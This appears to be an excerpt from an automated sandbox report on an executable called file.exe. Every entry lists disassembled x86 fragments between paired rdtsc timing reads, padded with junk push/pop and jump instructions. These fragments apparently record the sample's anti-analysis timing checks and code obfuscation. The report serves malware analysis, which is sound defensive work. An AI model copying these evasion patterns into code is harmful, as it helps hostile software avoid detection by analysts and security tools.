              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752EB5 second address: 752EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707654 second address: 7076D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FCE8904C1B8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jmp 00007FCE8904C1C0h 0x00000028 push 0000001Eh 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FCE8904C1B8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D1D61h] 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FCE8904C1C7h 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75300D second address: 753030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007FCE88B69066h 0x00000010 jmp 00007FCE88B69071h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7587ED second address: 75880A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8904C1C9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75897F second address: 758984 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758984 second address: 7589AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCE8904C1C8h 0x0000000f ja 00007FCE8904C1B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758C4A second address: 758C54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758C54 second address: 758C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCE8904C1B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C231 second address: 75C236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C236 second address: 75C240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C240 second address: 75C24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FCE88B6906Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C370 second address: 75C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C743 second address: 75C747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C51 second address: 762C57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763D27 second address: 763D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763D30 second address: 763D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763F92 second address: 763FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FCE88B69071h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763FAC second address: 763FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C8h 0x00000007 jmp 00007FCE8904C1BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FCE8904C1EAh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763FDD second address: 763FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCE88B69066h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FCE88B69066h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BE3F second address: 76BE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BE43 second address: 76BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BE51 second address: 76BE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BE55 second address: 76BE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BE59 second address: 76BE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FCE8904C1B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C10B second address: 76C112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C112 second address: 76C11E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C11E second address: 76C128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCE88B69066h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C128 second address: 76C14E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCE8904C1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCE8904C1C0h 0x00000015 je 00007FCE8904C1B6h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C14E second address: 76C158 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C158 second address: 76C176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCE8904C1C9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C176 second address: 76C183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FCE88B69072h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C183 second address: 76C189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C6FD second address: 76C703 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C859 second address: 76C85F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C85F second address: 76C86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FCE88B69066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C86F second address: 76C873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C9CD second address: 76C9D7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C9D7 second address: 76CA00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FCE8904C1BBh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CA00 second address: 76CA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776F78 second address: 776F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7756A6 second address: 7756B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCE88B69066h 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7756B4 second address: 7756C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jbe 00007FCE8904C1B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7756C4 second address: 7756CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7756CA second address: 7756D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775D79 second address: 775D83 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCE88B69066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775D83 second address: 775DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FCE8904C1BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FCE8904C1B6h 0x00000014 jnl 00007FCE8904C1B6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779347 second address: 77934D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B5F7 second address: 77B611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1BEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B611 second address: 77B615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B615 second address: 77B64A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e jnl 00007FCE8904C1BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FCE8904C1B6h 0x0000001c jmp 00007FCE8904C1C5h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F3DB second address: 77F3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F3E3 second address: 77F3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F3EA second address: 77F3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCE88B69070h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F3FF second address: 77F419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCE8904C1BFh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A582 second address: 78A5BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B6906Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCE88B69074h 0x00000010 jmp 00007FCE88B69076h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A5BC second address: 78A5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A5C4 second address: 78A5E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FCE88B6906Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A744 second address: 78A74E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCE8904C1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A74E second address: 78A765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FCE88B69071h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CBA2 second address: 78CBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CBA6 second address: 78CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C68F second address: 78C695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C695 second address: 78C69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C871 second address: 78C882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCE8904C1B8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79056D second address: 790572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790572 second address: 790578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790578 second address: 79057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79057C second address: 790590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FCE8904C1CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790590 second address: 790594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC76 second address: 79DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8904C1BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC87 second address: 79DC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB16 second address: 79DB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB1C second address: 79DB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB21 second address: 79DB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1AE9 second address: 7A1AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B6906Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8221 second address: 7A8225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8225 second address: 7A822F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88B69072h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AE9 second address: 7A6AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jl 00007FCE8904C1B8h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AF8 second address: 7A6AFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6AFF second address: 7A6B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007FCE8904C1C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6B0C second address: 7A6B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6DAC second address: 7A6DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FCE8904C1B6h 0x0000000a jbe 00007FCE8904C1B6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A70C9 second address: 7A70F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FCE88B69079h 0x0000000b ja 00007FCE88B69066h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A70F5 second address: 7A70F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7296 second address: 7A72AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88B69072h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A72AC second address: 7A72B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A72B0 second address: 7A72D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FCE88B69074h 0x0000000e jmp 00007FCE88B6906Ch 0x00000013 push edi 0x00000014 pop edi 0x00000015 jo 00007FCE88B69072h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A756A second address: 7A756E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A756E second address: 7A7574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAC77 second address: 7AAC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7DB second address: 7AA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7E1 second address: 7AA7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7E5 second address: 7AA7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA7EB second address: 7AA7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA950 second address: 7AA96E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 jg 00007FCE88B69066h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA96E second address: 7AA978 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE8904C1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADF91 second address: 7ADF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB9FD second address: 7BBA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBA03 second address: 7BBA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE132 second address: 7BE15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FCE8904C1C4h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FCE8904C1B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
